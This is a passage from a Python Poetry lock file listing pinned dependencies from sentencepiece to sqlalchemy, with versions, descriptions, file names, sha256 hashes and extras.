"sha256:18e800f206cd235dc27dc749299e05853a4e4332e8d3dfd81bf13d0e5b9007d9"}, {file = "sentencepiece-0.1.99-cp39-cp39-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:2ae1c40cda8f9d5b0423cfa98542735c0235e7597d79caf318855cdf971b2280"}, {file = "sentencepiece-0.1.99-cp39-cp39-win32.whl", hash = "sha256:c84ce33af12ca222d14a1cdd37bd76a69401e32bc68fe61c67ef6b59402f4ab8"}, {file = "sentencepiece-0.1.99-cp39-cp39-win_amd64.whl", hash = "sha256:350e5c74d739973f1c9643edb80f7cc904dc948578bcb1d43c6f2b173e5d18dd"}, {file = "sentencepiece-0.1.99.tar.gz", hash = "sha256:189c48f5cb2949288f97ccdb97f0473098d9c3dcf5a3d99d4eabe719ec27297f"}, ] [[package]] name = "setuptools" version = "67.8.0" description = "Easily download, build, install, upgrade, and uninstall Python packages" optional = false python-versions = ">=3.7" files = [ {file = "setuptools-67.8.0-py3-none-any.whl", hash = "sha256:5df61bf30bb10c6f756eb19e7c9f3b473051f48db77fddbe06ff2ca307df9a6f"}, {file = "setuptools-67.8.0.tar.gz", hash = 
"sha256:62642358adc77ffa87233bc4d2354c4b2682d214048f500964dbe760ccedf102"}, ] [package.extras] docs = ["furo", "jaraco.packaging (>=9)", "jaraco.tidelift (>=1.4)", "pygments-github-lexers (==0.0.5)", "rst.linker (>=1.9)", "sphinx (>=3.5)", "sphinx-favicon", "sphinx-hoverxref (<2)", "sphinx-inline-tabs", "sphinx-lint", "sphinx-notfound-page (==0.8.3)", "sphinx-reredirects", "sphinxcontrib-towncrier"] testing = ["build[virtualenv]", "filelock (>=3.4.0)", "flake8-2020", "ini2toml[lite] (>=0.9)", "jaraco.envs (>=2.2)", "jaraco.path (>=3.2.0)", "pip (>=19.1)", "pip-run (>=8.8)", "pytest (>=6)", "pytest-black (>=0.3.7)", "pytest-checkdocs (>=2.4)", "pytest-cov", "pytest-enabler (>=1.3)", "pytest-mypy (>=0.9.1)", "pytest-perf", "pytest-ruff", "pytest-timeout", "pytest-xdist", "tomli-w (>=1.0.0)", "virtualenv (>=13.0.0)", "wheel"] testing-integration = ["build[virtualenv]", "filelock (>=3.4.0)", "jaraco.envs (>=2.2)", "jaraco.path (>=3.2.0)", "pytest", "pytest-enabler", "pytest-xdist", "tomli", "virtualenv (>=13.0.0)", "wheel"] [[package]] name = "sgmllib3k" version = "1.0.0" description = "Py3k port of sgmllib." optional = true python-versions = "*" files = [ {file = "sgmllib3k-1.0.0.tar.gz", hash = "sha256:7868fb1c8bfa764c1ac563d3cf369c381d1325d36124933a726f29fcdaa812e9"}, ] [[package]] name = "shapely" version = "2.0.2" description = "Manipulation and analysis of geometric objects" optional = true python-versions = ">=3.7" files = [ {file = "shapely-2.0.2-cp310-cp310-macosx_10_9_universal2.whl", hash = "sha256:6ca8cffbe84ddde8f52b297b53f8e0687bd31141abb2c373fd8a9f032df415d6"}, {file = "shapely-2.0.2-cp310-cp310-macosx_10_9_x86_64.whl", hash = "sha256:baa14fc27771e180c06b499a0a7ba697c7988c7b2b6cba9a929a19a4d2762de3"}, {file = "shapely-2.0.2-cp310-cp310-macosx_11_0_arm64.whl", hash = "sha256:36480e32c434d168cdf2f5e9862c84aaf4d714a43a8465ae3ce8ff327f0affb7"}, {file = "shapely-2.0.2-cp310-cp310-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:4ef753200cbffd4f652efb2c528c5474e5a14341a473994d90ad0606522a46a2"}, {file = "shapely-2.0.2-cp310-cp310-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:a9a41ff4323fc9d6257759c26eb1cf3a61ebc7e611e024e6091f42977303fd3a"}, {file = "shapely-2.0.2-cp310-cp310-win32.whl", hash = "sha256:72b5997272ae8c25f0fd5b3b967b3237e87fab7978b8d6cd5fa748770f0c5d68"}, {file = "shapely-2.0.2-cp310-cp310-win_amd64.whl", hash = "sha256:34eac2337cbd67650248761b140d2535855d21b969d76d76123317882d3a0c1a"}, {file = "shapely-2.0.2-cp311-cp311-macosx_10_9_universal2.whl", hash = "sha256:5b0c052709c8a257c93b0d4943b0b7a3035f87e2d6a8ac9407b6a992d206422f"}, {file = "shapely-2.0.2-cp311-cp311-macosx_10_9_x86_64.whl", hash = "sha256:2d217e56ae067e87b4e1731d0dc62eebe887ced729ba5c2d4590e9e3e9fdbd88"}, {file = "shapely-2.0.2-cp311-cp311-macosx_11_0_arm64.whl", hash = "sha256:94ac128ae2ab4edd0bffcd4e566411ea7bdc738aeaf92c32a8a836abad725f9f"}, {file = "shapely-2.0.2-cp311-cp311-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:fa3ee28f5e63a130ec5af4dc3c4cb9c21c5788bb13c15e89190d163b14f9fb89"}, {file = "shapely-2.0.2-cp311-cp311-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:737dba15011e5a9b54a8302f1748b62daa207c9bc06f820cd0ad32a041f1c6f2"}, {file = "shapely-2.0.2-cp311-cp311-win32.whl", hash = "sha256:45ac6906cff0765455a7b49c1670af6e230c419507c13e2f75db638c8fc6f3bd"}, {file = "shapely-2.0.2-cp311-cp311-win_amd64.whl", hash = "sha256:dc9342fc82e374130db86a955c3c4525bfbf315a248af8277a913f30911bed9e"}, {file = 
"shapely-2.0.2-cp312-cp312-macosx_10_9_universal2.whl", hash = "sha256:06f193091a7c6112fc08dfd195a1e3846a64306f890b151fa8c63b3e3624202c"}, {file = "shapely-2.0.2-cp312-cp312-macosx_10_9_x86_64.whl", hash = "sha256:eebe544df5c018134f3c23b6515877f7e4cd72851f88a8d0c18464f414d141a2"}, {file = "shapely-2.0.2-cp312-cp312-macosx_11_0_arm64.whl", hash = "sha256:7e92e7c255f89f5cdf777690313311f422aa8ada9a3205b187113274e0135cd8"}, {file = "shapely-2.0.2-cp312-cp312-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:be46d5509b9251dd9087768eaf35a71360de6afac82ce87c636990a0871aa18b"}, {file = "shapely-2.0.2-cp312-cp312-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:a5533a925d8e211d07636ffc2fdd9a7f9f13d54686d00577eeb11d16f00be9c4"}, {file = "shapely-2.0.2-cp312-cp312-win32.whl", hash = "sha256:084b023dae8ad3d5b98acee9d3bf098fdf688eb0bb9b1401e8b075f6a627b611"}, {file = "shapely-2.0.2-cp312-cp312-win_amd64.whl", hash = "sha256:ea84d1cdbcf31e619d672b53c4532f06253894185ee7acb8ceb78f5f33cbe033"}, {file = "shapely-2.0.2-cp37-cp37m-macosx_10_9_x86_64.whl", hash = "sha256:ed1e99702125e7baccf401830a3b94d810d5c70b329b765fe93451fe14cf565b"}, {file = "shapely-2.0.2-cp37-cp37m-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:e7d897e6bdc6bc64f7f65155dbbb30e49acaabbd0d9266b9b4041f87d6e52b3a"}, {file = "shapely-2.0.2-cp37-cp37m-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:0521d76d1e8af01e712db71da9096b484f081e539d4f4a8c97342e7971d5e1b4"}, {file = "shapely-2.0.2-cp37-cp37m-win32.whl", hash = "sha256:5324be299d4c533ecfcfd43424dfd12f9428fd6f12cda38a4316da001d6ef0ea"}, {file = "shapely-2.0.2-cp37-cp37m-win_amd64.whl", hash = "sha256:78128357a0cee573257a0c2c388d4b7bf13cb7dbe5b3fe5d26d45ebbe2a39e25"}, {file = "shapely-2.0.2-cp38-cp38-macosx_10_9_universal2.whl", hash = "sha256:87dc2be34ac3a3a4a319b963c507ac06682978a5e6c93d71917618b14f13066e"}, {file = "shapely-2.0.2-cp38-cp38-macosx_10_9_x86_64.whl", hash = "sha256:42997ac806e4583dad51c80a32d38570fd9a3d4778f5e2c98f9090aa7db0fe91"}, {file = "shapely-2.0.2-cp38-cp38-macosx_11_0_arm64.whl", hash = "sha256:ccfd5fa10a37e67dbafc601c1ddbcbbfef70d34c3f6b0efc866ddbdb55893a6c"}, {file = "shapely-2.0.2-cp38-cp38-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:e7c95d3379ae3abb74058938a9fcbc478c6b2e28d20dace38f8b5c587dde90aa"}, {file = "shapely-2.0.2-cp38-cp38-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:6a21353d28209fb0d8cc083e08ca53c52666e0d8a1f9bbe23b6063967d89ed24"}, {file = "shapely-2.0.2-cp38-cp38-win32.whl", hash = "sha256:03e63a99dfe6bd3beb8d5f41ec2086585bb969991d603f9aeac335ad396a06d4"}, {file = "shapely-2.0.2-cp38-cp38-win_amd64.whl", hash = "sha256:c6fd29fbd9cd76350bd5cc14c49de394a31770aed02d74203e23b928f3d2f1aa"}, {file = "shapely-2.0.2-cp39-cp39-macosx_10_9_universal2.whl", hash = "sha256:1f217d28ecb48e593beae20a0082a95bd9898d82d14b8fcb497edf6bff9a44d7"}, {file = "shapely-2.0.2-cp39-cp39-macosx_10_9_x86_64.whl", hash = "sha256:394e5085b49334fd5b94fa89c086edfb39c3ecab7f669e8b2a4298b9d523b3a5"}, {file = "shapely-2.0.2-cp39-cp39-macosx_11_0_arm64.whl", hash = "sha256:fd3ad17b64466a033848c26cb5b509625c87d07dcf39a1541461cacdb8f7e91c"}, {file = "shapely-2.0.2-cp39-cp39-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:d41a116fcad58048d7143ddb01285e1a8780df6dc1f56c3b1e1b7f12ed296651"}, {file = "shapely-2.0.2-cp39-cp39-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:dea9a0651333cf96ef5bb2035044e3ad6a54f87d90e50fe4c2636debf1b77abc"}, {file = 
"shapely-2.0.2-cp39-cp39-win32.whl", hash = "sha256:b8eb0a92f7b8c74f9d8fdd1b40d395113f59bd8132ca1348ebcc1f5aece94b96"}, {file = "shapely-2.0.2-cp39-cp39-win_amd64.whl", hash = "sha256:794affd80ca0f2c536fc948a3afa90bd8fb61ebe37fe873483ae818e7f21def4"}, {file = "shapely-2.0.2.tar.gz", hash = "sha256:1713cc04c171baffc5b259ba8531c58acc2a301707b7f021d88a15ed090649e7"}, ] [package.dependencies] numpy = ">=1.14" [package.extras] docs = ["matplotlib", "numpydoc (==1.1.*)", "sphinx", "sphinx-book-theme", "sphinx-remove-toctrees"] test = ["pytest", "pytest-cov"] [[package]] name = "singlestoredb" version = "0.7.2" description = "Interface to the SingleStore database and cluster management APIs" optional = true python-versions = ">=3.6" files = [ {file = "singlestoredb-0.7.2-cp36-abi3-macosx_10_9_universal2.whl", hash = "sha256:73f03aa356d5d566444572e385825ac726ca2c811c5c5754c4077cbf28a204c7"}, {file = "singlestoredb-0.7.2-cp36-abi3-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:baefc644f255d87a433198a1a5f20f0197f37fb693b0d0a04045c216d10357e8"}, {file = "singlestoredb-0.7.2-cp36-abi3-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:9d946a7436fdf7ba4c365cc7791be7566b7c5456e3acade75f6d9428f9de4bcb"}, {file = "singlestoredb-0.7.2-cp36-abi3-win32.whl", hash = "sha256:dcfc61a7720044ee444c97485471f22abae500e10dfe99290fa7219347b4bdb5"}, {file = "singlestoredb-0.7.2-cp36-abi3-win_amd64.whl", hash = "sha256:0d961aa12e8dfca837d4006c580c5ba2f33eff4ef447dee1e1bbb7af64b6b1c4"}, {file = "singlestoredb-0.7.2.tar.gz", hash = "sha256:99a0328814217a8517223f47374f6c359798df7f9e025d53bf071811f8fcf56b"}, ] [package.dependencies] build = "*" PyJWT = "*" requests = "*" sqlparams = "*" wheel = "*" [package.extras] dataframe = ["ibis-singlestoredb"] dbt = ["dbt-singlestore"] ed22519 = ["PyNaCl (>=1.4.0)"] gssapi = ["gssapi"] ibis = ["ibis-singlestoredb"] kerberos = ["gssapi"] rsa = ["cryptography"] sqlalchemy = ["sqlalchemy-singlestoredb"] [[package]] name = "six" version = "1.16.0" description = "Python 2 and 3 compatibility utilities" optional = false python-versions = ">=2.7, !=3.0.*, !=3.1.*, !=3.2.*" files = [ {file = "six-1.16.0-py2.py3-none-any.whl", hash = "sha256:8abb2f1d86890a2dfb989f9a77cfcfd3e47c2a354b01111771326f8aa26e0254"}, {file = "six-1.16.0.tar.gz", hash = "sha256:1e61c37477a1626458e36f7b1d82aa5c9b094fa4802892072e49de9c60c4c926"}, ] [[package]] name = "smmap" version = "5.0.1" description = "A pure Python implementation of a sliding window memory map manager" optional = true python-versions = ">=3.7" files = [ {file = "smmap-5.0.1-py3-none-any.whl", hash = "sha256:e6d8668fa5f93e706934a62d7b4db19c8d9eb8cf2adbb75ef1b675aa332b69da"}, {file = "smmap-5.0.1.tar.gz", hash = "sha256:dceeb6c0028fdb6734471eb07c0cd2aae706ccaecab45965ee83f11c8d3b1f62"}, ] [[package]] name = "sniffio" version = "1.3.0" description = "Sniff out which async library your code is running under" optional = false python-versions = ">=3.7" files = [ {file = "sniffio-1.3.0-py3-none-any.whl", hash = "sha256:eecefdce1e5bbfb7ad2eeaabf7c1eeb404d7757c379bd1f7e5cce9d8bf425384"}, {file = "sniffio-1.3.0.tar.gz", hash = "sha256:e60305c5e5d314f5389259b7f22aaa33d8f7dee49763119234af3755c55b9101"}, ] [[package]] name = "socksio" version = "1.0.0" description = "Sans-I/O implementation of SOCKS4, SOCKS4A, and SOCKS5." 
optional = true
python-versions = ">=3.6"
files = [
    {file = "socksio-1.0.0-py3-none-any.whl", hash = "sha256:95dc1f15f9b34e8d7b16f06d74b8ccf48f609af32ab33c608d08761c5dcbb1f3"},
    {file = "socksio-1.0.0.tar.gz", hash = "sha256:f88beb3da5b5c38b9890469de67d0cb0f9d494b78b106ca1845f96c10b91c4ac"},
]

[[package]]
name = "soundfile"
version = "0.12.1"
description = "An audio library based on libsndfile, CFFI and NumPy"
optional = true
python-versions = "*"
files = [
    {file = "soundfile-0.12.1-py2.py3-none-any.whl", hash = "sha256:828a79c2e75abab5359f780c81dccd4953c45a2c4cd4f05ba3e233ddf984b882"},
    {file = "soundfile-0.12.1-py2.py3-none-macosx_10_9_x86_64.whl", hash = "sha256:d922be1563ce17a69582a352a86f28ed8c9f6a8bc951df63476ffc310c064bfa"},
    {file = "soundfile-0.12.1-py2.py3-none-macosx_11_0_arm64.whl", hash = "sha256:bceaab5c4febb11ea0554566784bcf4bc2e3977b53946dda2b12804b4fe524a8"},
    {file = "soundfile-0.12.1-py2.py3-none-manylinux_2_17_x86_64.whl", hash = "sha256:2dc3685bed7187c072a46ab4ffddd38cef7de9ae5eb05c03df2ad569cf4dacbc"},
    {file = "soundfile-0.12.1-py2.py3-none-manylinux_2_31_x86_64.whl", hash = "sha256:074247b771a181859d2bc1f98b5ebf6d5153d2c397b86ee9e29ba602a8dfe2a6"},
    {file = "soundfile-0.12.1-py2.py3-none-win32.whl", hash = "sha256:59dfd88c79b48f441bbf6994142a19ab1de3b9bb7c12863402c2bc621e49091a"},
    {file = "soundfile-0.12.1-py2.py3-none-win_amd64.whl", hash = "sha256:0d86924c00b62552b650ddd28af426e3ff2d4dc2e9047dae5b3d8452e0a49a77"},
    {file = "soundfile-0.12.1.tar.gz", hash = "sha256:e8e1017b2cf1dda767aef19d2fd9ee5ebe07e050d430f77a0a7c66ba08b8cdae"},
]

[package.dependencies]
cffi = ">=1.0"

[package.extras]
numpy = ["numpy"]

[[package]]
name = "soupsieve"
version = "2.5"
description = "A modern CSS selector implementation for Beautiful Soup."
optional = false
python-versions = ">=3.8"
files = [
    {file = "soupsieve-2.5-py3-none-any.whl", hash = "sha256:eaa337ff55a1579b6549dc679565eac1e3d000563bcb1c8ab0d0fefbc0c2cdc7"},
    {file = "soupsieve-2.5.tar.gz", hash = "sha256:5663d5a7b3bfaeee0bc4372e7fc48f9cff4940b3eec54a6451cc5299f1097690"},
]

[[package]]
name = "soxr"
version = "0.3.7"
description = "High quality, one-dimensional sample-rate conversion library"
optional = true
python-versions = ">=3.6"
files = [
    {file = "soxr-0.3.7-cp310-cp310-macosx_10_9_x86_64.whl", hash = "sha256:ac81c4af6a993d5b7c0b466bbac4835bad2b14ec32f342b2c1f83e4cf825e301"},
    {file = "soxr-0.3.7-cp310-cp310-macosx_11_0_arm64.whl", hash = "sha256:8d8a2b3e7f8d0255e2484fb82cb66c86da6fb25b342ef793cceca9ce9a61aa16"},
    {file = "soxr-0.3.7-cp310-cp310-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:a0cd6eb6f6bbda2e8de36672cf2f0529ced6e638773150744ef075be0cc4f52c"},
    {file = "soxr-0.3.7-cp310-cp310-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:e47d86af35b942c92606fc2d5dfccf3f01309329475571ae2312bbf9edc3a790"},
    {file = "soxr-0.3.7-cp310-cp310-win_amd64.whl", hash = "sha256:0e291adfaf9f2a7c4dd180a1b8c280f9beb1c84cb381853e4f4b3434d002ed7f"},
    {file = "soxr-0.3.7-cp311-cp311-macosx_10_9_x86_64.whl", hash = "sha256:9e811450f0e91972932bd37ac58e32e44002c2c99db2aa926a9e7ba164545034"},
    {file = "soxr-0.3.7-cp311-cp311-macosx_11_0_arm64.whl", hash = "sha256:9cea63014ce91035074e1228c9340e2b8609faf964e268705fcac5135d05060c"},
    {file = "soxr-0.3.7-cp311-cp311-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:bfab27830f6217a15b83445988225c3aeea3bbccfa9399ced291e53e1b05925d"},
    {file = "soxr-0.3.7-cp311-cp311-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:286858e3078d76c11b6d490b66fed3c9bb2a4229759f6be03ceef5c02189bf2c"},
"sha256:286858e3078d76c11b6d490b66fed3c9bb2a4229759f6be03ceef5c02189bf2c"}, {file = "soxr-0.3.7-cp311-cp311-win_amd64.whl", hash = "sha256:54985ff33292192d2937be80df3e5f3a44d6d53e6835f727d6b99b7cdd3f1611"}, {file = "soxr-0.3.7-cp312-cp312-macosx_10_9_x86_64.whl", hash = "sha256:83c74ef6d61d7dcd81be26f91bee0a420f792f5c1982266f2a80e655f0650a98"}, {file = "soxr-0.3.7-cp312-cp312-macosx_11_0_arm64.whl", hash = "sha256:cb1e14663a43fe88b8fbc287822a159028366a820abe1a0a9670fb53618cb47b"}, {file = "soxr-0.3.7-cp312-cp312-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:48acdfbcf870ab54f645b1cfd641bce92c1e3a67346c3bf0f6c0ad2873c1dd35"}, {file = "soxr-0.3.7-cp312-cp312-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:ea663b76f2b0ec1576b8a43aef317aec080abc0a67a4015fcd9f3407039f260a"}, {file = "soxr-0.3.7-cp312-cp312-win_amd64.whl", hash = "sha256:42da0d9eb79c70e5a41917f1b48a032e241a48eb4a1bcea7c80577302ff26974"}, {file = "soxr-0.3.7-cp37-cp37m-macosx_10_9_x86_64.whl", hash = "sha256:511c6b2279c8ddd83459d129d69f628f7aae4616ae0a1912963985bd89e35df7"}, {file = "soxr-0.3.7-cp37-cp37m-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:a37c518c0b5d70162956d808d6c2e249bae0672e414e0dcfc101e200d8c31f3c"}, {file = "soxr-0.3.7-cp37-cp37m-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:27f2890528d2b2e358938ab660a6b8346802863f5b6b646204d7ff8ab0ca2c66"}, {file = "soxr-0.3.7-cp37-cp37m-win_amd64.whl", hash = "sha256:52467c8c012495544a6dcfcce6b5bcbbc653d24fe9bb33c0b6191acecdb5e297"}, {file = "soxr-0.3.7-cp38-cp38-macosx_10_9_x86_64.whl", hash = "sha256:ce12b93747958f2769d6b297e6e27c73d9ad635fe8104ef052bece9c8a322824"}, {file = "soxr-0.3.7-cp38-cp38-macosx_11_0_arm64.whl", hash = "sha256:1cd65dc7b96ea3cb6c8c48e6020e859680556cc42dd3d4de44779530cce21037"}, {file = "soxr-0.3.7-cp38-cp38-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:d994f1a7690b1b13ab639ea33e0c1d78415b64d88d6df4af705a9443f97b9687"}, {file = "soxr-0.3.7-cp38-cp38-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:e87b58bc9e8c2caa16f07726f666bd043f0a49ca937baa803ce7708003b27833"}, {file = "soxr-0.3.7-cp38-cp38-win_amd64.whl", hash = "sha256:07f4c0c6125ea1482fa187ad5f007216712ee0a93586a9b2f80e79c0bf944cf7"}, {file = "soxr-0.3.7-cp39-cp39-macosx_10_9_x86_64.whl", hash = "sha256:e5267c3ba34d4b873d9bbe3a9e58418b01ae4fd04349a4f944d9943b9ddac0f7"}, {file = "soxr-0.3.7-cp39-cp39-macosx_11_0_arm64.whl", hash = "sha256:6e39668c250e221db888cf3b290a16fbe10a702d9a4eb604a127f720040de583"}, {file = "soxr-0.3.7-cp39-cp39-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:f8ceeb74e5a55d903cc286d3bd12c2d8f8c85d02894071e9ec92ab405430907c"}, {file = "soxr-0.3.7-cp39-cp39-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:0eed6bf58192dd1bb93becd2444de4d712689713d727b32fd55623ae9aae7df7"}, {file = "soxr-0.3.7-cp39-cp39-win_amd64.whl", hash = "sha256:7221302b4547d02a3f38dd3cd15317ab2b78873c75921db5f4a070848f0c71be"}, {file = "soxr-0.3.7.tar.gz", hash = "sha256:436ddff00c6eb2c75b79c19cfdca7527b1e31b5fad738652f044045ba6258593"}, ] [package.dependencies] numpy = "*" [package.extras] docs = ["linkify-it-py", "myst-parser", "sphinx", "sphinx-book-theme"] test = ["pytest"] [[package]] name = "sqlalchemy" version = "2.0.22" description = "Database Abstraction Library" optional = false python-versions = ">=3.7" files = [ {file = "SQLAlchemy-2.0.22-cp310-cp310-macosx_10_9_x86_64.whl", hash = "sha256:f146c61ae128ab43ea3a0955de1af7e1633942c2b2b4985ac51cc292daf33222"}, 
{file = "SQLAlchemy-2.0.22-cp310-cp310-macosx_11_0_arm64.whl", hash = "sha256:875de9414393e778b655a3d97d60465eb3fae7c919e88b70cc10b40b9f56042d"}, {file = "SQLAlchemy-2.0.22-cp310-cp310-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:13790cb42f917c45c9c850b39b9941539ca8ee7917dacf099cc0b569f3d40da7"}, {file = "SQLAlchemy-2.0.22-cp310-cp310-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:e04ab55cf49daf1aeb8c622c54d23fa4bec91cb051a43cc24351ba97e1dd09f5"}, {file = "SQLAlchemy-2.0.22-cp310-cp310-musllinux_1_1_aarch64.whl", hash = "sha256:a42c9fa3abcda0dcfad053e49c4f752eef71ecd8c155221e18b99d4224621176"}, {file = "SQLAlchemy-2.0.22-cp310-cp310-musllinux_1_1_x86_64.whl", hash = "sha256:14cd3bcbb853379fef2cd01e7c64a5d6f1d005406d877ed9509afb7a05ff40a5"}, {file = "SQLAlchemy-2.0.22-cp310-cp310-win32.whl", hash = "sha256:d143c5a9dada696bcfdb96ba2de4a47d5a89168e71d05a076e88a01386872f97"}, {file = "SQLAlchemy-2.0.22-cp310-cp310-win_amd64.whl", hash = "sha256:ccd87c25e4c8559e1b918d46b4fa90b37f459c9b4566f1dfbce0eb8122571547"}, {file = "SQLAlchemy-2.0.22-cp311-cp311-macosx_10_9_x86_64.whl", hash = "sha256:4f6ff392b27a743c1ad346d215655503cec64405d3b694228b3454878bf21590"}, {file = "SQLAlchemy-2.0.22-cp311-cp311-macosx_11_0_arm64.whl", hash = "sha256:f776c2c30f0e5f4db45c3ee11a5f2a8d9de68e81eb73ec4237de1e32e04ae81c"}, {file = "SQLAlchemy-2.0.22-cp311-cp311-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:c8f1792d20d2f4e875ce7a113f43c3561ad12b34ff796b84002a256f37ce9437"}, {file = "SQLAlchemy-2.0.22-cp311-cp311-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:d80eeb5189d7d4b1af519fc3f148fe7521b9dfce8f4d6a0820e8f5769b005051"}, {file = "SQLAlchemy-2.0.22-cp311-cp311-musllinux_1_1_aarch64.whl", hash = "sha256:69fd9e41cf9368afa034e1c81f3570afb96f30fcd2eb1ef29cb4d9371c6eece2"}, {file = "SQLAlchemy-2.0.22-cp311-cp311-musllinux_1_1_x86_64.whl", hash = "sha256:54bcceaf4eebef07dadfde424f5c26b491e4a64e61761dea9459103ecd6ccc95"}, {file = "SQLAlchemy-2.0.22-cp311-cp311-win32.whl", hash = "sha256:7ee7ccf47aa503033b6afd57efbac6b9e05180f492aeed9fcf70752556f95624"}, {file = "SQLAlchemy-2.0.22-cp311-cp311-win_amd64.whl", hash = "sha256:b560f075c151900587ade06706b0c51d04b3277c111151997ea0813455378ae0"}, {file = "SQLAlchemy-2.0.22-cp312-cp312-macosx_10_9_x86_64.whl", hash = "sha256:2c9bac865ee06d27a1533471405ad240a6f5d83195eca481f9fc4a71d8b87df8"}, {file = "SQLAlchemy-2.0.22-cp312-cp312-macosx_11_0_arm64.whl", hash = "sha256:625b72d77ac8ac23da3b1622e2da88c4aedaee14df47c8432bf8f6495e655de2"}, {file = "SQLAlchemy-2.0.22-cp312-cp312-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:b39a6e21110204a8c08d40ff56a73ba542ec60bab701c36ce721e7990df49fb9"}, {file = "SQLAlchemy-2.0.22-cp312-cp312-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:53a766cb0b468223cafdf63e2d37f14a4757476157927b09300c8c5832d88560"}, {file = "SQLAlchemy-2.0.22-cp312-cp312-musllinux_1_1_aarch64.whl", hash = "sha256:0e1ce8ebd2e040357dde01a3fb7d30d9b5736b3e54a94002641dfd0aa12ae6ce"}, {file = "SQLAlchemy-2.0.22-cp312-cp312-musllinux_1_1_x86_64.whl", hash = "sha256:505f503763a767556fa4deae5194b2be056b64ecca72ac65224381a0acab7ebe"}, {file = "SQLAlchemy-2.0.22-cp312-cp312-win32.whl", hash = "sha256:154a32f3c7b00de3d090bc60ec8006a78149e221f1182e3edcf0376016be9396"}, {file = "SQLAlchemy-2.0.22-cp312-cp312-win_amd64.whl", hash = "sha256:129415f89744b05741c6f0b04a84525f37fbabe5dc3774f7edf100e7458c48cd"}, {file = "SQLAlchemy-2.0.22-cp37-cp37m-macosx_10_9_x86_64.whl", hash = 
"sha256:3940677d341f2b685a999bffe7078697b5848a40b5f6952794ffcf3af150c301"}, {file = "SQLAlchemy-2.0.22-cp37-cp37m-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:55914d45a631b81a8a2cb1a54f03eea265cf1783241ac55396ec6d735be14883"}, {file = "SQLAlchemy-2.0.22-cp37-cp37m-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:2096d6b018d242a2bcc9e451618166f860bb0304f590d205173d317b69986c95"}, {file = "SQLAlchemy-2.0.22-cp37-cp37m-musllinux_1_1_aarch64.whl", hash = "sha256:19c6986cf2fb4bc8e0e846f97f4135a8e753b57d2aaaa87c50f9acbe606bd1db"}, {file = "SQLAlchemy-2.0.22-cp37-cp37m-musllinux_1_1_x86_64.whl", hash = "sha256:6ac28bd6888fe3c81fbe97584eb0b96804bd7032d6100b9701255d9441373ec1"}, {file = "SQLAlchemy-2.0.22-cp37-cp37m-win32.whl", hash = "sha256:cb9a758ad973e795267da334a92dd82bb7555cb36a0960dcabcf724d26299db8"}, {file = "SQLAlchemy-2.0.22-cp37-cp37m-win_amd64.whl", hash = "sha256:40b1206a0d923e73aa54f0a6bd61419a96b914f1cd19900b6c8226899d9742ad"}, {file = "SQLAlchemy-2.0.22-cp38-cp38-macosx_10_9_x86_64.whl", hash = "sha256:3aa1472bf44f61dd27987cd051f1c893b7d3b17238bff8c23fceaef4f1133868"}, {file = "SQLAlchemy-2.0.22-cp38-cp38-macosx_11_0_arm64.whl", hash = "sha256:56a7e2bb639df9263bf6418231bc2a92a773f57886d371ddb7a869a24919face"}, {file = "SQLAlchemy-2.0.22-cp38-cp38-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:ccca778c0737a773a1ad86b68bda52a71ad5950b25e120b6eb1330f0df54c3d0"}, {file = "SQLAlchemy-2.0.22-cp38-cp38-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:7c6c3e9350f9fb16de5b5e5fbf17b578811a52d71bb784cc5ff71acb7de2a7f9"}, {file = "SQLAlchemy-2.0.22-cp38-cp38-musllinux_1_1_aarch64.whl", hash = "sha256:564e9f9e4e6466273dbfab0e0a2e5fe819eec480c57b53a2cdee8e4fdae3ad5f"}, {file = "SQLAlchemy-2.0.22-cp38-cp38-musllinux_1_1_x86_64.whl", hash = "sha256:af66001d7b76a3fab0d5e4c1ec9339ac45748bc4a399cbc2baa48c1980d3c1f4"}, {file = "SQLAlchemy-2.0.22-cp38-cp38-win32.whl", hash = "sha256:9e55dff5ec115316dd7a083cdc1a52de63693695aecf72bc53a8e1468ce429e5"}, {file = "SQLAlchemy-2.0.22-cp38-cp38-win_amd64.whl", hash = "sha256:4e869a8ff7ee7a833b74868a0887e8462445ec462432d8cbeff5e85f475186da"}, {file = 